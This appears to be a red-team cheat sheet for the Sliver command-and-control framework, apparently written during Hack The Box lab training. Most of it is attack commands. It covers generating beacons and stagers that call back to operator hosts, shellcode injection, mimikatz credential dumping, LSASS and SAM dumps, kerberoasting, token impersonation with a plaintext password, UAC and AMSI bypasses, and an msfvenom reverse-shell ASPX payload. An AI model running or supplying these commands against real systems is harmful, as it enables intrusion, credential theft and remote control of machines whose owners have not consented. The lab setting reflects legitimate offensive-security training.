Installation
Server Setup
Sliver's Server component has the important role of serving as the location implants will communicate back to.
Sliver's Client component has the role of being the location the user will execute the commands and tools needed to fulfill their objectives.
Copy Intrusionz3r0@htb[/htb]$ wget -q https://github.com/BishopFox/sliver/releases/download/vx.x.xx/sliver-server_linux
Intrusionz3r0@htb[/htb]$ chmod +x ./sliver-server_linux
Intrusionz3r0@htb[/htb]$ sudo apt install mingw-w64 Client Setup
Copy Intrusionz3r0@htb[/htb]$ wget -q https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-client_linux
Intrusionz3r0@htb[/htb]$ chmod +x ./sliver-client_linux
Intrusionz3r0@htb[/htb]$ ./sliver-client_linux import Intrusionz3r0_10.10.14.5.cfg
2023/09/27 11:45:03 Saved new client config to: /home/user/.sliver-client/configs/user_ipaddress.cfg
Intrusionz3r0@htb[/htb]$ ./sliver-client_linux Operator profile
Sliver can differentiate who can connect based on the generated profile from its server.
Copy [server] sliver > new-operator -n Intrusionz3r0 -l 10.10.14.5
[*] Generating new client certificate, please wait ...
[*] Saved new client config to: /opt/silver/Intrusionz3r0_10.10.14.5.cfg Multiplayer mode
Copy [server] sliver > multiplayer Armory
Copy sliver > armory install seatbelt
sliver > armory install <tool-name>
sliver > armory install all Example 1: UAC-BOF-Bonanza
Copy Intrusionz3r0@htb[/htb]$ git clone https://github.com/icyguider/UAC-BOF-Bonanza.git
Intrusionz3r0@htb[/htb]$ cp -rp PATH/UACBypasses/MODULE ~/.sliver-client/extensions/
Intrusionz3r0@htb[/htb]$ cd ~/.sliver-client/extensions/MODULE/; make
#Load modules from Sliver
sliver > extensions load ~/.sliver-client/extensions/MODULE Example 2: Chisel
Copy Intrusionz3r0@htb[/htb]$ git clone https://github.com/MrAle98/chisel
Intrusionz3r0@htb[/htb]$ cd chisel/
Intrusionz3r0@htb[/htb]$ mkdir ~/.sliver-client/extensions/chisel
Intrusionz3r0@htb[/htb]$ cp extension.json ~/.sliver-client/extensions/chisel
Intrusionz3r0@htb[/htb]$ make windowsdll_64
Intrusionz3r0@htb[/htb]$ make windowsdll_32
Intrusionz3r0@htb[/htb]$ cp chisel.x64.dll ~/.sliver-client/extensions/chisel/
Intrusionz3r0@htb[/htb]$ cp chisel.x86.dll ~/.sliver-client/extensions/chisel/ Generate Beacons
Copy sliver > generate beacon --http <your_server_ip>:<PORT> --os linux --arch x86 --format elf --seconds 5 --jitter 3
sliver > generate beacon --mtls <your_server_ip> --os windows --arch amd64 --format exe --save /var/www/html
sliver > generate beacon --http 10.10.14.62:9002 --skip-symbols -N http-beacon --jitter introduces randomness to callback times.
--seconds sets callback interval.
--skip-symbols disables obfuscation (less stealthy).
One of the main disadvantages of skipping the symbol obfuscation is that the beacon will be easily detectable as Sliver due to the imports being presented in plaintext.
Listeners
Copy sliver > http --lport 8088
sliver > http --lhost 10.10.14.62 --lport 9002
sliver > http
sliver > mtls Useful commands
Execute commands
Copy sliver (puppet-mtls) > execte -q cmd '/c <COMMAND>'
sliver (puppet-mtls) > execute -o powershell <PSCOMMAND>
sliver (puppet-mtls) > sharpsh -- '-e -c <BASE64-PowershellCommand>'
sliver (puppet-mtls) > execute-assembly /home/user/Rubeus.exe
sliver (puppet-mtls) > inline-execute-assembly /home/user/Rubeus.exe 'kerberoast /format:hashcat /user:alice /nowrap'
execute command as it will open a command prompt or the tool's GUI.
Memory Injection & Shellcode
Copy #Inject shellcode into a new process
sliver (puppet-mtls) > execute-assembly /home/Intrusionz3r0/Documents/tools/Rubeus.exe createnetonly /program:C:\\windows\\system32\\notepad.exe
sliver (puppet-mtls) > execute-shellcode -p <pid> /home/Intrusionz3r0/Documents/tools/godpotato.bin #Created by donut
#Evade Defense loading an executing DLL in a remote process
sideload /path/mimikatz.exe "token::elevate privilege::debug sekurlsa::logonpasswords exit" Privilege escalation
Copy #From Administrator to NT Authority System
sliver (TOTAL_NATIONAL) > getsystem Credentials Attacks
Copy #DUMP SAM Database
sliver (TOTAL_NATIONAL) > hashdump
#Dump LSA secrets
sliver (TOTAL_NATIONAL) > ps -e lsass
sliver (TOTAL_NATIONAL) > procdump --pid 524 --save /tmp/lsass.dmp
#Dump DPAPI creds
sliver (puppet-mtls) > sharpdpapi machinecredentials Domain Enumeration
Copy #Domain Enumeration
sliver (puppet-mtls) > sharp-hound-4 -s -t 300 -- -c all --zipfilename filename #(Compatible: bloodhound-convert or bloodhound-community)
sliver (puppet-mtls) > sharpview -- <POWEVIEW-COMMAND>
sliver (puppet-mtls) > sharpsh -t 300 -- '-u C:\\temp\\script.ps1 -c Invoke-Method'
sliver (puppet-mtls) > sharpsh -t 300 -- '-u PATH/PowerView.ps1 -e -c <BASe64>' #use base64 command on linux
sliver (http-beacon) > c2tc-domaininfo Lateral Movement
Copy #Impersonation
sliver (http-beacon) > make-token -u svc_sql -p jkhnrjk123! -d dc.domain.local
sliver (puppet-mtls) > ps
sliver (puppet-mtls) > migrate -p 3908 Full login session as if from keyboard input.
Run processes locally as a normal user; full access.
For accessing network resources; no full session created.
Access remote shares (e.g. \\server\share), no process execution.
Used by scheduled tasks or batch jobs.
Run automated tasks with minimal interaction.
Used by services running under a user account.
Run persistent background services.
Triggered when a user unlocks the workstation.
Not typically used in token impersonation.
Like network logon, but with plaintext password.
Remote authentication requiring cleartext password.
Credentials used only for outbound connections; local identity unchanged.
runas /netonly scenarios; access network as another user.
Kerberos
Copy #Kerberoast
sliver (http-beacon) > inline-execute-assembly /path/Rubeus.exe 'kerberoast /format:hashcat /user:alice /nowrap'
sliver (http-beacon) > c2tc-kerberoast roast alice
sliver (http-beacon) > bof-roast rdp/web01.child.htb.local
#Delegation
sliver (http-beacon) > delegationbof 6 dc.domain.local ADSC
Copy #ADCS
sliver (http-beacon) > certify -- find
sliver (puppet-mtls) > sa-adcs-enum Windows Enumeration
Copy #Windows Enumeration
sliver (puppet-mtls) > sa-sc-enum #Enum windows services
sliver (puppet-mtls) > sa-netshares #Enum network shares SMB
sliver (puppet-mtls) > sa-cacls #Enum permissions
sliver (puppet-mtls) > sa-probe 10.10.235.135 22 #Check Open ports AMSI Bypass
Copy #Bypass AMSI
sliver (puppet-mtls) > SspiUacBypass 'C:\ProgramData\Puppet\puppet-update.exe' Miscellaneous
Execute an unmanaged powershell
Copy ~/Documents/Tools/donut/donut -a 2 -i UnmanagedPowerShell.exe -o UnmanagedPowerShell.bin
[ Donut shellcode generator v1 (built Apr 30 2025 19:45:41)
[ Copyright (c) 2019-2021 TheWover, Odzhan
[ Instance type : Embedded
[ Module file : "UnmanagedPowerShell.exe"
[ Entropy : Random names + Encryption
[ File type : EXE
[ Target CPU : amd64
[ AMSI/WDLP/ETW : continue
[ PE Headers : overwrite
[ Shellcode : "UnmanagedPowerShell.bin"
[ Exit : Thread
Copy sliver (COMBINED_AGLET) > execute-shellcode -i /home/Intrusionz3r0/Documents/Tools/UnmanagedPowerShell.bin
[*] Started remote shell with pid 1888
PS > New-ADIDNSNode -Tombstone -Verbose -Node WIN-Y5CPSL66T45 -DATA 10.8.5.48 Create a shellcode with MSFVenom and Silver
We need to create a profile, a stage-listener, a stager and generate a payload through msfvenom.
Copy Sliver > profiles new --http 10.10.14.5:8088 --format shellcode z3r0
sliver > stage-listener --url tcp://10.10.14.5:4443 --profile z3r0
sliver > http -L 10.10.14.5 -l 8088
sliver > generate stager --lhost 10.10.14.5 --lport 4443 --format csharp --save staged.txt
#Lastly create the payload and replace the staged.txt on the sliver.aspx.
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.5 LPORT=4443 -f aspx > sliver.aspx 
